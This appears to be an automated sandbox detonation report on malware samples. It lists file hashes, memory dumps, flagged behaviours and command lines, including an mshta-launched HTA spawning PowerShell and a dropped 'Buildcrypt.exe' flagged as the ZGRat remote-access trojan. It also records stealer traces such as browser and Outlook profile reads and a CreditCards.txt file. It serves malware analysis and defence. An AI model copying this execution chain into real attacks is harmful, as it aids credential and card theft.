memory/352-37-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-35-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-31-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-29-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-27-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-23-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-21-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-17-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-15-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-13-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-9-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-7-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-5-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-4-0x0000000005660000-0x0000000005790000-memory.dmp

memory/352-938-0x0000000005A70000-0x0000000005ABC000-memory.dmp

memory/352-937-0x00000000059A0000-0x0000000005A6E000-memory.dmp

memory/352-936-0x00000000057A0000-0x00000000057A1000-memory.dmp

memory/352-939-0x0000000006250000-0x00000000067F4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RagCrypt.exe.log

MD5 c3941d9fa38f1717d5cecd7a2ca71667
SHA1 33b5362675383b58b4166ed9f9a61e5aa6768d2e
SHA256 f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256
SHA512 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45

memory/2524-945-0x0000000000400000-0x0000000000578000-memory.dmp

memory/2524-944-0x00000000751F0000-0x00000000759A0000-memory.dmp

memory/2524-948-0x0000000005620000-0x0000000005630000-memory.dmp

memory/2524-947-0x0000000005460000-0x00000000054C6000-memory.dmp

memory/2524-946-0x00000000053C0000-0x0000000005452000-memory.dmp

memory/352-943-0x00000000751F0000-0x00000000759A0000-memory.dmp

memory/2524-949-0x0000000006300000-0x000000000630A000-memory.dmp

memory/2524-950-0x00000000087C0000-0x0000000008810000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Data\Downloads.txt

MD5 ae0f7fab163139c661e576fe0af08651
SHA1 7545ab94360fd93f2209021b4cecabb92592be27
SHA256 832ff6318e2c78ac1907c74f3911f8815b545c16449cbce6753e21fb723cb657
SHA512 a3e342a3c72c079db96a8d6bb108830c3a772b926be0cf4e5d09ebb09e1babbc7602959bf1f82c8df8764f45479f318c3205114f23c96fd663efa792cff86b8b

C:\Users\Admin\AppData\Local\Temp\Data\CreditCards.txt

MD5 0f5f7a38759e578c92bcf62c45d80b8a
SHA1 211e70ede55cce5bf67f685d85cbd030a8517d2b
SHA256 39059fc9bf3844dacbe329b623ca7a06f72656216dd4e52dc9b938b3d95289dc
SHA512 8130466f8ee346c0b931a34e63e2e9dc6f4070b85faaa58efdddd4d165fa605457d3137472c5fd09da87b0135a4beb660ee39cb390d78be6f0786950036b205d

memory/2524-990-0x00000000751F0000-0x00000000759A0000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

135s

Max time network

150s

Command Line

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Utsxokye.wav"

Signatures

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\A: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\unregmp2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\unregmp2.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\unregmp2.exe N/A

Processes

C:\Program Files (x86)\Windows Media Player\wmplayer.exe

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Utsxokye.wav"

C:\Program Files (x86)\Windows Media Player\setup_wm.exe

"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Utsxokye.wav"

C:\Windows\SysWOW64\unregmp2.exe

"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon

C:\Windows\system32\unregmp2.exe

"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT

Network

Country Destination Domain Proto
US 8.8.8.8:53 wmploc.dll udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 18.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 23.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 31.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 29.179.17.96.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\wmsetup.log

MD5 13ab2123a617187ba186a53cef7a5f77
SHA1 d649d1cbb01018d02fa965adef7b97408d86fe9d
SHA256 e8aa79d9d7ac6947fd7c2fc35b501dbc212ad1c1439d58bd58deae02ff81cf92
SHA512 e02c68c61711a572e90727129d9ff5f7494218e625f0600e135c44b57a7c29ef2cf2e686fdfb0afe04b4b248f853c88c35cd70761c8585c434d4a62a339fd7ad

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

MD5 7050d5ae8acfbe560fa11073fef8185d
SHA1 5bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256 cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512 a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

MD5 c374c25875887db7d072033f817b6ce1
SHA1 3a6d10268f30e42f973dadf044dba7497e05cdaf
SHA256 05d47b87b577841cc40db176ea634ec49b0b97066e192e1d48d84bb977e696b6
SHA512 6a14f81a300695c09cb335c13155144e562c86bb0ddfdcab641eb3a168877ad3fcc0579ad86162622998928378ea2ffe5a244b3ddbe6c11a959dbb34af374a7d

Analysis: behavioral4

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

148s

Max time network

151s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Docs.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

ZGRat

rat zgrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1000 set thread context of 4664 N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe C:\Users\Admin\AppData\Roaming\Buildcrypt.exe

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000_Classes\Local Settings C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Buildcrypt.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2776 wrote to memory of 952 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2776 wrote to memory of 952 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2776 wrote to memory of 952 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 952 wrote to memory of 2116 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
PID 952 wrote to memory of 2116 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
PID 952 wrote to memory of 2116 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
PID 952 wrote to memory of 1000 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Buildcrypt.exe
PID 952 wrote to memory of 1000 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Buildcrypt.exe
PID 952 wrote to memory of 1000 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Buildcrypt.exe
PID 2116 wrote to memory of 3428 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 3428 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 2116 wrote to memory of 3428 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3428 wrote to memory of 3600 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
